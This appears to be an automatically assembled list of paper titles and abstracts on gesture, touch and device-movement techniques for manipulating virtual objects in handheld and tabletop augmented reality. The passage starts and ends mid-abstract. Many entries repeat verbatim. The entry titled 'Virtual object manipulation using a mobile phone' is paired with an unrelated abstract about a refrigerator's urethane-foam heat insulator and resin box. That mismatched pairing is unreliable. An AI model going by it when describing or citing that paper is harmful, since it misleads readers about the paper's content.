presents interesting challenges. In this paper, we aim to understand which approaches to 3D virtual object manipulations are suited to this scenario. To this end, we implemented five different techniques based on the literature. Four are mid-air techniques, while the remainder relies on multi-touch gestures, which act as a baseline. Our setup combines affordable non-intrusive tracking technologies with a multi-touch stereo tabletop, providing head and hands tracking, to improve both depth perception and seamless interactions above the table. We conducted a user evaluation to find out which technique appealed most to participants. Results suggest that mid-air interactions, combining direct manipulation with six degrees of freedom for the dominant hand, are both more satisfying and efficient than the alternatives tested. --- paper_title: Visual tracking of bare fingers for interactive surfaces paper_content: Visual tracking of bare fingers allows more direct manipulation of digital objects, multiple simultaneous users interacting with their two hands, and permits the interaction on large surfaces, using only commodity hardware. After presenting related work, we detail our implementation. Its design is based on our modeling of two classes of algorithms that are key to the tracker: Image Differencing Segmentation (IDS) and Fast Rejection Filters (FRF). We introduce a new chromatic distance for IDS and a FRF that is independent to finger rotation. The system runs at full frame rate (25 Hz) with an average total system latency of 80 ms, independently of the number of tracked fingers. When used in a controlled environment such as a meeting room, its robustness is satisfying for everyday use. --- paper_title: Using custom transformation axes for mid-air manipulation of 3D virtual objects paper_content: Virtual Reality environments are able to offer natural interaction metaphors. However, it is difficult to accurately place virtual objects in the desired position and orientation using gestures in mid-air. Previous research concluded that the separation of degrees-of-freedom (DOF) can lead to better results, but these benefits come with an increase in time when performing complex tasks, due to the additional number of transformations required. In this work, we assess whether custom transformation axes can be used to achieve the accuracy of DOF separation without sacrificing completion time. For this, we developed a new manipulation technique, MAiOR, which offers translation and rotation separation, supporting both 3-DOF and 1-DOF manipulations, using personalized axes for the latter. Additionally, it also has direct 6-DOF manipulation for coarse transformations, and scaled object translation for increased placement. We compared MAiOR against an exclusively 6-DOF approach and a widget-based approach with explicit DOF separation. Results show that, contrary to previous research suggestions, single DOF manipulations are not appealing to users. Instead, users favored 3-DOF manipulations above all, while keeping translation and rotation independent. --- paper_title: Mockup Builder: Direct 3D Modeling On and Above the Surface in a Continuous Interaction Space paper_content: Our work introduces a semi-immersive environment for conceptual design where virtual mockups are obtained from gestures we aim to get closer to the way people conceive, create and manipulate three-dimensional shapes. We present on-and-above-the-surface interaction techniques following Guiard's asymmetric bimanual model to take advantage of the continuous interaction space for creating and editing 3D models in a stereoscopic environment. To allow for more expressive interactions, our approach continuously combines hand and finger tracking in the space above the table with multi-touch on its surface. This combination brings forth an alternative design environment where users can seamlessly switch between interacting on the surface or in the space above it depending on the task. Our approach integrates continuous space usage with bimanual interaction to provide an expressive set of 3D modeling operations. Preliminary trials with our experimental setup show this as a very promising avenue for further work. --- paper_title: Gesture-based interaction via finger tracking for mobile augmented reality paper_content: The goal of this research is to explore new interaction metaphors for augmented reality on mobile phones, i.e. applications where users look at the live image of the device’s video camera and 3D virtual objects enrich the scene that they see. Common interaction concepts for such applications are often limited to pure 2D pointing and clicking on the device’s touch screen. Such an interaction with virtual objects is not only restrictive but also difficult, for example, due to the small form factor. In this article, we investigate the potential of finger tracking for gesture-based interaction. We present two experiments evaluating canonical operations such as translation, rotation, and scaling of virtual objects with respect to performance (time and accuracy) and engagement (subjective user feedback). Our results indicate a high entertainment value, but low accuracy if objects are manipulated in midair, suggesting great possibilities for leisure applications but limited usage for serious tasks. --- paper_title: Real-time hand interaction for augmented reality on mobile phones paper_content: Over the past few years, Augmented Reality has become widely popular in the form of smart phone applications, however most smart phone-based AR applications are limited in user interaction and do not support gesture-based direct manipulation of the augmented scene. In this paper, we introduce a new AR interaction methodology, employing users' hands and fingers to interact with the virtual (and possibly physical) objects that appear on the mobile phone screen. The goal of this project was to support different types of interaction (selection, transformation, and fine-grain control of an input value) while keeping the methodology for hand detection as simple as possible to maintain good performance on smart phones. We evaluated our methods in user studies, collecting task performance data and user impressions about this direct way of interacting with augmented scenes through mobile phones. --- paper_title: Free-hand interaction for handheld augmented reality using an RGB-depth camera paper_content: In this paper, we present a novel gesture-based interaction method for handheld Augmented Reality (AR) implemented on a tablet with an RGB-Depth camera attached. Compared with conventional device-centric interaction methods like keypad, stylus, or touchscreen input, natural gesture-based interfaces offer a more intuitive experience for AR applications. Combining with depth information, gesture interfaces can extend handheld AR interaction into full 3D space. In our system we retrieve the 3D hand skeleton from color and depth frames, mapping the results to corresponding manipulations of virtual objects in the AR scene. Our method allows users to control virtual objects in 3D space using their bare hands and perform operations such as translation, rotation, and zooming. --- paper_title: Poster: Markerless fingertip-based 3D interaction for handheld augmented reality in a small workspace paper_content: Compared with traditional screen-touch input, natural gesture-based interaction approaches could offer a more intuitive user experience in handheld Augmented Reality (AR) applications. However, most gesture interaction techniques for handheld AR only use two degrees of freedom without the third depth dimension, while AR virtual objects are overlaid on a view of a three dimensional space. In this paper, we investigate a markerless fingertip-based 3D interaction method within a client-server framework in a small workspace. Our solution includes seven major components: (1) fingertip detection (2) fingertip depth acquisition (3) marker tracking (4) coordinate transformation (5) data communication (6) gesture interaction (7) graphic rendering. We describe the process of each step in details and present performance results of our prototype. --- paper_title: A REVIEW OF 3D GESTURE INTERACTION FOR HANDHELD AUGMENTED REALITY paper_content: Interaction for Handheld Augmented Reality (HAR) is a challenging research topic because of the small screen display and limited input options. Although 2D touch screen input is widely used, 3D gesture interaction is a suggested alternative input method. Recent 3D gesture interaction research mainly focuses on using RGB-Depth cameras to detect the spatial position and pose of fingers, using this data for virtual object manipulations in the AR scene. In this paper we review previous 3D gesture research on handheld interaction metaphors for HAR. We present their novelties as well as limitations, and discuss future research directions of 3D gesture interaction for HAR. Our results indicate that 3D gesture input on HAR is a potential interaction method for assisting a user in many tasks such as in education, urban simulation and 3D games. --- paper_title: 3D gesture interaction for handheld augmented reality paper_content: In this paper, we present a prototype for exploring natural gesture interaction with Handheld Augmented Reality (HAR) applications, using visual tracking based AR and freehand gesture based interaction detected by a depth camera. We evaluated this prototype in a user study comparing 3D gesture input methods with traditional touch-based techniques, using canonical manipulation tasks that are common in AR scenarios. We collected task performance data and user feedback via a usability questionnaire. The 3D gesture input methods were found to be slower, but the majority of the participants preferred them and gave them higher usability ratings. Being intuitive and natural was the most common feedback about the 3D freehand interface. We discuss implications of this research and directions for further work. --- paper_title: Balloon Selection: A Multi-Finger Technique for Accurate Low-Fatigue 3D Selection paper_content: Balloon selection is a 3D interaction technique that is modeled after the real world metaphor of manipulating a helium balloon attached to a string. Balloon selection allows for precise 3D selection in the volume above a tabletop surface by using multiple fingers on a multi-touch-sensitive surface. The 3DOF selection tasks is decomposed in part into a 2DOF positioning task performed by one finger on the tabletop in an absolute 2D Cartesian coordinate system and a 1DOF positioning task performed by another finger on the tabletop in a relative 2D polar coordinate system. We have evaluated balloon selection in a formal user study that compared it to two well-known interaction techniques for selecting a static 3D target: a 3DOF tracked wand and keyboard cursor keys. We found that balloon selection was significantly faster than using cursor keys and had a significantly lower error rate than the wand. The lower error rate appeared to result from the user's hands being supported by the tabletop surface, resulting in significantly reduced hand tremor and arm fatigue. --- paper_title: Real-time hand interaction for augmented reality on mobile phones paper_content: Over the past few years, Augmented Reality has become widely popular in the form of smart phone applications, however most smart phone-based AR applications are limited in user interaction and do not support gesture-based direct manipulation of the augmented scene. In this paper, we introduce a new AR interaction methodology, employing users' hands and fingers to interact with the virtual (and possibly physical) objects that appear on the mobile phone screen. The goal of this project was to support different types of interaction (selection, transformation, and fine-grain control of an input value) while keeping the methodology for hand detection as simple as possible to maintain good performance on smart phones. We evaluated our methods in user studies, collecting task performance data and user impressions about this direct way of interacting with augmented scenes through mobile phones. --- paper_title: Touch and hand gesture-based interactions for directly manipulating 3D virtual objects in mobile augmented reality paper_content: Mobile augmented reality (AR) has been widely used in smart and mobile device-based applications such as entertainment, games, visual experience, and information visualization. However, most of the mobile AR applications have limitations in natural user interaction and do not fully support the direct manipulation of 3D AR objects. This paper proposes a new method for naturally and directly manipulating 3D AR objects through touch and hand gesture-based interactions in handheld devices. The touch gesture is used for the AR object selection and the natural hand gesture is used for the direct and interactive manipulation of the selected objects. Thus, the hybrid interaction makes the user more accurately interact with and manipulate AR objects in the real 3D space, not in the 2D space. In particular, natural hand gestures are detected by the Leap Motion sensor attached to the front or back of mobile devices. Thus the user can easily interacts with 3D AR objects for 3D transformation to enhance usability and usefulness. In this research, comprehensive comparative analyses were performed among the proposed approach and the widely used screen touch-based approach and vision-based approach in terms of quantitative and qualitative aspects. Quantitative analysis was conducted by measuring task completion time and failure rate to perform given tasks such as 3D object matching and grasp-hang-release operation. Both tasks require simultaneous 3D translation and 3D rotation. In addition, we have compared the gesture performance depending on whether the gesture sensor is located in the front or the back of the mobile device. Furthermore, to support other complex operations, an assembly task has also been evaluated. The assembly task consists of a sequence of combining parts into a sub-assembly. Qualitative analysis was performed through enquiring questionnaire after the experiment that examines factors such as ease-of-use, ease-of-natural interaction, etc. Both analyses showed that the proposed approach can provide more natural and intuitive interaction and manipulation of mobile AR objects. Several implementation results will also be given to show the advantage and effectiveness of the proposed approach. --- paper_title: Free-hand interaction for handheld augmented reality using an RGB-depth camera paper_content: In this paper, we present a novel gesture-based interaction method for handheld Augmented Reality (AR) implemented on a tablet with an RGB-Depth camera attached. Compared with conventional device-centric interaction methods like keypad, stylus, or touchscreen input, natural gesture-based interfaces offer a more intuitive experience for AR applications. Combining with depth information, gesture interfaces can extend handheld AR interaction into full 3D space. In our system we retrieve the 3D hand skeleton from color and depth frames, mapping the results to corresponding manipulations of virtual objects in the AR scene. Our method allows users to control virtual objects in 3D space using their bare hands and perform operations such as translation, rotation, and zooming. --- paper_title: Mid-air interactions above stereoscopic interactive tables paper_content: Stereoscopic tabletops offer unique visualization capabilities, enabling users to perceive virtual objects as if they were lying above the surface. While allowing virtual objects to coexist with user actions in the physical world, interaction with these virtual objects above the surface presents interesting challenges. In this paper, we aim to understand which approaches to 3D virtual object manipulations are suited to this scenario. To this end, we implemented five different techniques based on the literature. Four are mid-air techniques, while the remainder relies on multi-touch gestures, which act as a baseline. Our setup combines affordable non-intrusive tracking technologies with a multi-touch stereo tabletop, providing head and hands tracking, to improve both depth perception and seamless interactions above the table. We conducted a user evaluation to find out which technique appealed most to participants. Results suggest that mid-air interactions, combining direct manipulation with six degrees of freedom for the dominant hand, are both more satisfying and efficient than the alternatives tested. --- paper_title: 3D Finger CAPE: Clicking Action and Position Estimation under Self-Occlusions in Egocentric Viewpoint paper_content: In this paper we present a novel framework for simultaneous detection of click action and estimation of occluded fingertip positions from egocentric viewed single-depth image sequences. For the detection and estimation, a novel probabilistic inference based on knowledge priors of clicking motion and clicked position is presented. Based on the detection and estimation results, we were able to achieve a fine resolution level of a bare hand-based interaction with virtual objects in egocentric viewpoint. Our contributions include: (i) a rotation and translation invariant finger clicking action and position estimation using the combination of 2D image-based fingertip detection with 3D hand posture estimation in egocentric viewpoint. (ii) a novel spatio-temporal random forest, which performs the detection and estimation efficiently in a single framework. We also present (iii) a selection process utilizing the proposed clicking action detection and position estimation in an arm reachable AR/VR space, which does not require any additional device. Experimental results show that the proposed method delivers promising performance under frequent self-occlusions in the process of selecting objects in AR/VR space whilst wearing an egocentric-depth camera-attached HMD. --- paper_title: Dynamics of tilt-based browsing on mobile devices paper_content: A tilt-controlled photo browsing method for small mobile devices is presented. The implementation uses continuous inputs from an accelerometer, and a multimodal (visual, audio and vibrotactile) display coupled with the states of this model. The model is based on a simple physical model, with its characteristics shaped to enhance usability. We show how the dynamics of the physical model can be shaped to make the handling qualities of the mobile device fit the browsing task. We implemented the proposed algorithm on Samsung MITs PDA with tri-axis accelerometer and a vibrotactile motor. The experiment used seven novice users browsing from 100 photos. We compare a tilt-based interaction method with a button-based browser and an iPod wheel. We discuss the usability performance and contrast this with subjective experience from the users. The iPod wheel has significantly poorer performance than button pushing or tilt interaction, despite its commercial popularity. --- paper_title: Combining multi-touch input and device movement for 3D manipulations in mobile augmented reality environments paper_content: Nowadays, handheld devices are capable of displaying augmented environments in which virtual content overlaps reality. To interact with these environments it is necessary to use a manipulation technique. The objective of a manipulation technique is to define how the input data modify the properties of the virtual objects. Current devices have multi-touch screens that can serve as input. Additionally, the position and rotation of the device can also be used as input creating both an opportunity and a design challenge. In this paper we compared three manipulation techniques which namely employ multi-touch, device position and a combination of both. A user evaluation on a docking task revealed that combining multi-touch and device movement yields the best task completion time and efficiency. Nevertheless, using only the device movement and orientation is more intuitive and performs worse only in large rotations. --- paper_title: Face to face collaborative AR on mobile phones paper_content: Mobile phones are an ideal platform for augmented reality. In this paper we describe how they also can be used to support face to face collaborative AR applications. We have created a custom port of the ARToolKit library to the Symbian mobile phone operating system and then developed a sample collaborative AR game based on this. We describe the game in detail and user feedback from people who have played it. We also provide general design guidelines that could be useful for others who are developing mobile phone collaborative AR applications. --- paper_title: SlidAR: A 3D positioning method for SLAM-based handheld augmented reality paper_content: Abstract Handheld Augmented Reality (HAR) has the potential to introduce Augmented Reality (AR) to large audiences due to the widespread use of suitable handheld devices. However, many of the current HAR systems are not considered very practical and they do not fully answer to the needs of the users. One of the challenging areas in HAR is the in-situ AR content creation where the correct and accurate positioning of virtual objects to the real world is fundamental. Due to the hardware limitations of handheld devices and possible restrictions in the environment, the correct 3D positioning of objects can be difficult to achieve we are unable to use AR markers or correctly map the 3D structure of the environment. We present SlidAR, a 3D positioning for Simultaneous Localization And Mapping (SLAM) based HAR systems. SlidAR utilizes 3D ray-casting and epipolar geometry for virtual object positioning. It does not require a perfect 3D reconstruction of the environment nor any virtual depth cues. We have conducted a user experiment to evaluate the efficiency of SlidAR method against an existing device-centric positioning method that we call HoldAR. Results showed that SlidAR was significantly faster, required significantly less device movement, and also got significantly better subjective evaluation from the test participants. SlidAR also had higher positioning accuracy, although not significantly. --- paper_title: Virtual object manipulation using a mobile phone paper_content: A heat insulating box, such as a refrigerator box, comprises a heat insulator and a box member that is in contact with the heat insulator. The heat insulator is formed of a urethane foam using either HCFC-123 (CHCl2CF3) or HCFC-141b (CH3CCl2F) or both as a forming agent, and the box member is formed of an acrylonitrile/ethylene- PROPORTIONAL -olefinic rubbery polymer/styrene resin (A/epdm/S resin), an acrylonitrile/alkyl acrylate ester rubbery polymer/styrene resin (ASA resin), a mixture of an A/epdm/s resin and an ASA resin, or a mixture of an ASA resin with an acrylonitrile/butadiene/styrene resin. --- paper_title: A study on improving close and distant device movement pose manipulation for hand-held augmented reality paper_content: Hand-held smart devices are equipped with powerful processing units, high resolution screens and cameras, that in combination makes them suitable for video see-through Augmented Reality. Many Augmented Reality applications require interaction, such as selection and 3D pose manipulation. One way to perform intuitive, high precision 3D pose manipulation is by direct or indirect mapping of device movement. There are two approaches to device movement interaction; one fixes the virtual object to the device, which therefore becomes the pivot point for the object, thus makes it difficult to rotate without translate. The second approach avoids latter issue by considering rotation and translation separately, relative to the object's center point. The result of this is that the object instead moves out of view for yaw and pitch rotations. In this paper we study these two techniques and compare them with a modification where user perspective rendering is used to solve the rotation issues. The study showed that the modification improves speed as well as both perceived control and intuitiveness among the subjects. --- paper_title: Integrated view-input ar interaction for virtual object manipulation using tablets and smartphones paper_content: Lately, mobile augmented reality (AR) has become very popular and is used for many commercial and product promotional activities. However, in almost all mobile AR applications, the user only views annotated information or the preset motion of the virtual object in an AR environment and is unable to interact with the virtual objects as if he/she were interacting with real objects in the real environment. In this paper, in an attempt to realize enhanced intuitive and realistic object manipulation in the mobile AR environment, we propose an integrated view-input AR interaction method, which integrates user device manipulation and virtual object manipulation. The method enables the user to hold a 3D virtual object by touching the displayed object on the 2D touch screen of a mobile device, and to move and rotate the object by moving and rotating the mobile device while viewing the held object by way of the 2D screen of the mobile device. Based on this concept, we implemented three types of integrated methods, namely the Rod, Center, and Touch methods, and conducted a user study to investigate the baseline performance metrics of the proposed method on an AR object manipulation task. The Rod method achieved the highest success rate (91%). Participants' feedback indicated that this is because the Rod method is the most natural, and evoked a fixed mental model that is conceivable in the real environment. These results indicated that visualizing the manipulation point on the screen and restricting the user's interactivity with virtual objects from the user's position of view based on a conceivable mental model would be able to aid the user to achieve precise manipulation. --- paper_title: Mobile phone based AR scene assembly paper_content: In this paper we describe a mobile phone based Augmented Reality application for 3D scene assembly. Augmented Reality on mobile phones extends the interaction capabilities on such handheld devices. It adds a 6 DOF isomorphic interaction technique for manipulating 3D content. We give details of an application that we believe to be the first where 3D content can be manipulated using both the movement of a camera tracked mobile phone and a traditional button interface as input for transformations. By centering the scene in a tangible marker space in front of the phone we provide a mean for bimanual interaction. We describe the implementation, the interaction techniques we have developed and initial user response to trying the application. --- paper_title: An empirical evaluation of virtual hand techniques for 3D object manipulation in a tangible augmented reality environment paper_content: In this paper, we present a Fitts' law-based formal evaluation process and the corresponding results for 3D object manipulation techniques based on a virtual hand metaphor in a tangible augmented reality (TAR) environment. Specifically, we extend the design parameters of the 1D scale Fitts' law to 3D scale and then refine an evaluation model in order to bring generality and ease of adaptation to various TAR applications. Next, we implement and compare standard TAR manipulation techniques using a cup, a paddle, a cube, and a proposed extended paddle prop. Most manipulation techniques were well-modeled in terms of linear regression according to Fitts' law, with a correlation coefficient value of over 0.9. Notably, the throughput by ISO 9241-9 of the extended paddle technique peaked at around 1.39 to 2 times higher than in the other techniques, due to the instant 3D positioning of the 3D objects. In the discussion, we subsequently examine the characteristics of the TAR manipulation techniques in terms of stability, speed, comfort, and understanding. As a result, our evaluation process, results, and analysis can be useful in guiding the design and implementation of future TAR interfaces. --- paper_title: Gesture-based interaction via finger tracking for mobile augmented reality paper_content: The goal of this research is to explore new interaction metaphors for augmented reality on mobile phones, i.e. applications where users look at the live image of the device’s video camera and 3D virtual objects enrich the scene that they see. Common interaction concepts for such applications are often limited to pure 2D pointing and clicking on the device’s touch screen. Such an interaction with virtual objects is not only restrictive but also difficult, for example, due to the small form factor. In this article, we investigate the potential of finger tracking for gesture-based interaction. We present two experiments evaluating canonical operations such as translation, rotation, and scaling of virtual objects with respect to performance (time and accuracy) and engagement (subjective user feedback). Our results indicate a high entertainment value, but low accuracy if objects are manipulated in midair, suggesting great possibilities for leisure applications but limited usage for serious tasks. --- paper_title: Combining multi-touch input and device movement for 3D manipulations in mobile augmented reality environments paper_content: Nowadays, handheld devices are capable of displaying augmented environments in which virtual content overlaps reality. To interact with these environments it is necessary to use a manipulation technique. The objective of a manipulation technique is to define how the input data modify the properties of the virtual objects. Current devices have multi-touch screens that can serve as input. Additionally, the position and rotation of the device can also be used as input creating both an opportunity and a design challenge. In this paper we compared three manipulation techniques which namely employ multi-touch, device position and a combination of both. A user evaluation on a docking task revealed that combining multi-touch and device movement yields the best task completion time and efficiency. Nevertheless, using only the device movement and orientation is more intuitive and performs worse only in large rotations. --- paper_title: A REVIEW OF 3D GESTURE INTERACTION FOR HANDHELD AUGMENTED REALITY paper_content: Interaction for Handheld Augmented Reality (HAR) is a challenging research topic because of the small screen display and limited input options. Although 2D touch screen input is widely used, 3D gesture interaction is a suggested alternative input method. Recent 3D gesture interaction research mainly focuses on using RGB-Depth cameras to detect the spatial position and pose of fingers, using this data for virtual object manipulations in the AR scene. In this paper we review previous 3D gesture research on handheld interaction metaphors for HAR. We present their novelties as well as limitations, and discuss future research directions of 3D gesture interaction for HAR. Our results indicate that 3D gesture input on HAR is a potential interaction method for assisting a user in many tasks such as in education, urban simulation and 3D games. --- paper_title: Shift: a technique for operating pen-based interfaces using touch paper_content: Retrieving the stylus of a pen-based device takes time and requires a second hand. Especially for short intermittent interactions many users therefore choose to use their bare fingers. Although convenient, this increases targeting times and error rates. We argue that the main reasons are the occlusion of the target by the user's finger and ambiguity about which part of the finger defines the selection point. We propose a pointing technique we call Shift that is designed to address these issues. When the user touches the screen, Shift creates a callout showing a copy of the occluded screen area and places it in a non-occluded location. The callout also shows a pointer representing the selection point of the finger. Using this visual feedback, users guide the pointer into the target by moving their finger on the screen surface and commit the target acquisition by lifting the finger. Unlike existing techniques, Shift is only invoked when necessary--over large targets no callout is created and users enjoy the full performance of an unaltered touch screen. We report the results of a user study showing that with Shift participants can select small targets with much lower error rates than an unaided touch screen and that Shift is faster than Offset Cursor for larger targets. --- paper_title: The fat thumb: using the thumb's contact size for single-handed mobile interaction paper_content: Modern mobile devices allow a rich set of multi-finger interactions that combine modes into a single fluid act, for example, one finger for panning blending into a two-finger pinch gesture for zooming. Such gestures require the use of both hands: one holding the device while the other is interacting. While on the go, however, only one hand may be available to both hold the device and interact with it. This mostly limits interaction to a single-touch (i.e., the thumb), forcing users to switch between input modes explicitly. In this paper, we contribute the Fat Thumb interaction technique, which uses the thumb's contact size as a form of simulated pressure. This adds a degree of freedom, which can be used, for example, to integrate panning and zooming into a single interaction. Contact size determines the mode (i.e., panning with a small size, zooming with a large one), while thumb movement performs the selected mode. We discuss nuances of the Fat Thumb based on the thumb's limited operational range and motor skills when that hand holds the device. We compared Fat Thumb to three alternative techniques, where people had to precisely pan and zoom to a predefined region on a map and found that the Fat Thumb technique compared well to existing techniques. --- paper_title: Art of defense: a collaborative handheld augmented reality board game paper_content: In this paper, we present Art of Defense (AoD), a cooperative handheld augmented reality (AR) game. AoD is an example of what we call an AR Board Game, a class of tabletop games that combine handheld computers (such as camera phones) with physical game pieces to create a merged physical/virtual game on the table-top. This paper discusses the technical aspects of the game, the design rationale and process we followed, and the resulting player experience. The goal of this research is to explore the affordances and constraints of handheld AR interfaces for collaborative social games, and to create a game that leverages them as fully as possible. The results from the user study show that the game is fun to play, and that by tightly registering the virtual content with the tangible game pieces, tabletop AR games enable a kind of social play experience unlike non-AR computer games. We hope this research will inspire the creation of other handheld augmented reality games in the future, both on and off the tabletop. --- paper_title: 3D gesture interaction for handheld augmented reality paper_content: In this paper, we present a prototype for exploring natural gesture interaction with Handheld Augmented Reality (HAR) applications, using visual tracking based AR and freehand gesture based interaction detected by a depth camera. We evaluated this prototype in a user study comparing 3D gesture input methods with traditional touch-based techniques, using canonical manipulation tasks that are common in AR scenarios. We collected task performance data and user feedback via a usability questionnaire. The 3D gesture input methods were found to be slower, but the majority of the participants preferred them and gave them higher usability ratings. Being intuitive and natural was the most common feedback about the 3D freehand interface. We discuss implications of this research and directions for further work. --- paper_title: SlidAR: A 3D positioning method for SLAM-based handheld augmented reality paper_content: Abstract Handheld Augmented Reality (HAR) has the potential to introduce Augmented Reality (AR) to large audiences due to the widespread use of suitable handheld devices. However, many of the current HAR systems are not considered very practical and they do not fully answer to the needs of the users. One of the challenging areas in HAR is the in-situ AR content creation where the correct and accurate positioning of virtual objects to the real world is fundamental. Due to the hardware limitations of handheld devices and possible restrictions in the environment, the correct 3D positioning of objects can be difficult to achieve we are unable to use AR markers or correctly map the 3D structure of the environment. We present SlidAR, a 3D positioning for Simultaneous Localization And Mapping (SLAM) based HAR systems. SlidAR utilizes 3D ray-casting and epipolar geometry for virtual object positioning. It does not require a perfect 3D reconstruction of the environment nor any virtual depth cues. We have conducted a user experiment to evaluate the efficiency of SlidAR method against an existing device-centric positioning method that we call HoldAR. Results showed that SlidAR was significantly faster, required significantly less device movement, and also got significantly better subjective evaluation from the test participants. SlidAR also had higher positioning accuracy, although not significantly. --- paper_title: A study on improving close and distant device movement pose manipulation for hand-held augmented reality paper_content: Hand-held smart devices are equipped with powerful processing units, high resolution screens and cameras, that in combination makes them suitable for video see-through Augmented Reality. Many Augmented Reality applications require interaction, such as selection and 3D pose manipulation. One way to perform intuitive, high precision 3D pose manipulation is by direct or indirect mapping of device movement. There are two approaches to device movement interaction; one fixes the virtual object to the device, which therefore becomes the pivot point for the object, thus makes it difficult to rotate without translate. The second approach avoids latter issue by considering rotation and translation separately, relative to the object's center point. The result of this is that the object instead moves out of view for yaw and pitch rotations. In this paper we study these two techniques and compare them with a modification where user perspective rendering is used to solve the rotation issues. The study showed that the modification improves speed as well as both perceived control and intuitiveness among the subjects. --- paper_title: Balloon Selection: A Multi-Finger Technique for Accurate Low-Fatigue 3D Selection paper_content: Balloon selection is a 3D interaction technique that is modeled after the real world metaphor of manipulating a helium balloon attached to a string. Balloon selection allows for precise 3D selection in the volume above a tabletop surface by using multiple fingers on a multi-touch-sensitive surface. The 3DOF selection tasks is decomposed in part into a 2DOF positioning task performed by one finger on the tabletop in an absolute 2D Cartesian coordinate system and a 1DOF positioning task performed by another finger on the tabletop in a relative 2D polar coordinate system. We have evaluated balloon selection in a formal user study that compared it to two well-known interaction techniques for selecting a static 3D target: a 3DOF tracked wand and keyboard cursor keys. We found that balloon selection was significantly faster than using cursor keys and had a significantly lower error rate than the wand. The lower error rate appeared to result from the user's hands being supported by the tabletop surface, resulting in significantly reduced hand tremor and arm fatigue. --- paper_title: The Continuous Interaction Space: Interaction Techniques Unifying Touch and Gesture On and Above a Digital Surface paper_content: The rising popularity of digital table surfaces has spawned considerable interest in new interaction techniques. Most interactions fall into one of two modalities: 1) direct touch and multi-touch (by hand and by tangibles) directly on the surface, and 2) hand gestures above the surface. The limitation is that these two modalities ignore the rich interaction space between them. To move beyond this limitation, we first contribute a unification of these discrete interaction modalities called the continuous interaction space. The idea is that many interaction techniques can be developed that go beyond these two modalities, where they can leverage the space between them. That is, we believe that the underlying system should treat the space on and above the surface as a continuum, where a person can use touch, gestures, and tangibles anywhere in the space and naturally move between them. Our second contribution illustrates this, where we introduce a variety of interaction categories that exploit the space between these modalities. For example, with our Extended Continuous Gestures category, a person can start an interaction with a direct touch and drag, then naturally lift off the surface and continue their drag with a hand gesture over the surface. For each interaction category, we implement an example (or use prior work) that illustrates how that technique can be applied. In summary, our primary contribution is to broaden the design space of interaction techniques for digital surfaces, where we populate the continuous interaction space both with concepts and examples that emerge from considering this space as a continuum. --- paper_title: Real-time hand interaction for augmented reality on mobile phones paper_content: Over the past few years, Augmented Reality has become widely popular in the form of smart phone applications, however most smart phone-based AR applications are limited in user interaction and do not support gesture-based direct manipulation of the augmented scene. In this paper, we introduce a new AR interaction methodology, employing users' hands and fingers to interact with the virtual (and possibly physical) objects that appear on the mobile phone screen. The goal of this project was to support different types of interaction (selection, transformation, and fine-grain control of an input value) while keeping the methodology for hand detection as simple as possible to maintain good performance on smart phones. We evaluated our methods in user studies, collecting task performance data and user impressions about this direct way of interacting with augmented scenes through mobile phones. --- paper_title: Touch and hand gesture-based interactions for directly manipulating 3D virtual objects in mobile augmented reality paper_content: Mobile augmented reality (AR) has been widely used in smart and mobile device-based applications such as entertainment, games, visual experience, and information visualization. However, most of the mobile AR applications have limitations in natural user interaction and do not fully support the direct manipulation of 3D AR objects. This paper proposes a new method for naturally and directly manipulating 3D AR objects through touch and hand gesture-based interactions in handheld devices. The touch gesture is used for the AR object selection and the natural hand gesture is used for the direct and interactive manipulation of the selected objects. Thus, the hybrid interaction makes the user more accurately interact with and manipulate AR objects in the real 3D space, not in the 2D space. In particular, natural hand gestures are detected by the Leap Motion sensor attached to the front or back of mobile devices. Thus the user can easily interacts with 3D AR objects for 3D transformation to enhance usability and usefulness. In this research, comprehensive comparative analyses were performed among the proposed approach and the widely used screen touch-based approach and vision-based approach in terms of quantitative and qualitative aspects. Quantitative analysis was conducted by measuring task completion time and failure rate to perform given tasks such as 3D object matching and grasp-hang-release operation. Both tasks require simultaneous 3D translation and 3D rotation. In addition, we have compared the gesture performance depending on whether the gesture sensor is located in the front or the back of the mobile device. Furthermore, to support other complex operations, an assembly task has also been evaluated. The assembly task consists of a sequence of combining parts into a sub-assembly. Qualitative analysis was performed through enquiring questionnaire after the experiment that examines factors such as ease-of-use, ease-of-natural interaction, etc. Both analyses showed that the proposed approach can provide more natural and intuitive interaction and manipulation of mobile AR objects. Several implementation results will also be given to show the advantage and effectiveness of the proposed approach. --- paper_title: Back-of-device interaction allows creating very small touch devices paper_content: In this paper, we explore how to add pointing input capabilities to very small screen devices. On first sight, touchscreens seem to allow for particular compactness, because they integrate input and screen into the same physical space. The opposite is true, however, because the user's fingers occlude contents and prevent precision. We argue that the key to touch-enabling very small devices is to use touch on the device backside. In order to study this, we have created a 2.4" prototype device; we simulate screens smaller than that by masking the screen. We present a user study in which participants completed a pointing task successfully across display sizes when using a back-of device interface. The touchscreen-based control condition (enhanced with the shift technique), in contrast, failed for screen diagonals below 1 inch. We present four form factor concepts based on back-of-device interaction and provide design guidelines extracted from a second user study. --- paper_title: Free-hand interaction for handheld augmented reality using an RGB-depth camera paper_content: In this paper, we present a novel gesture-based interaction method for handheld Augmented Reality (AR) implemented on a tablet with an RGB-Depth camera attached. Compared with conventional device-centric interaction methods like keypad, stylus, or touchscreen input, natural gesture-based interfaces offer a more intuitive experience for AR applications. Combining with depth information, gesture interfaces can extend handheld AR interaction into full 3D space. In our system we retrieve the 3D hand skeleton from color and depth frames, mapping the results to corresponding manipulations of virtual objects in the AR scene. Our method allows users to control virtual objects in 3D space using their bare hands and perform operations such as translation, rotation, and zooming. --- paper_title: Smartphone as an augmented reality authoring tool via multi-touch based 3D interaction method paper_content: In this paper we present an Augmented Reality (AR) authoring tool for smartphones which facilitates intuitive interactions that manipulate the augmented virtual objects in real-time. A novel 3D interaction method using multi-touch interface and camera pose is proposed for intuitive authoring. With the gestures of two fingers on the touch screen, the user can adjust 3 DOF translation and 3 DOF rotation to a selected virtual object. The capabilities of the authoring tool are demonstrated on a smartphone. --- paper_title: Integrated view-input ar interaction for virtual object manipulation using tablets and smartphones paper_content: Lately, mobile augmented reality (AR) has become very popular and is used for many commercial and product promotional activities. However, in almost all mobile AR applications, the user only views annotated information or the preset motion of the virtual object in an AR environment and is unable to interact with the virtual objects as if he/she were interacting with real objects in the real environment. In this paper, in an attempt to realize enhanced intuitive and realistic object manipulation in the mobile AR environment, we propose an integrated view-input AR interaction method, which integrates user device manipulation and virtual object manipulation. The method enables the user to hold a 3D virtual object by touching the displayed object on the 2D touch screen of a mobile device, and to move and rotate the object by moving and rotating the mobile device while viewing the held object by way of the 2D screen of the mobile device. Based on this concept, we implemented three types of integrated methods, namely the Rod, Center, and Touch methods, and conducted a user study to investigate the baseline 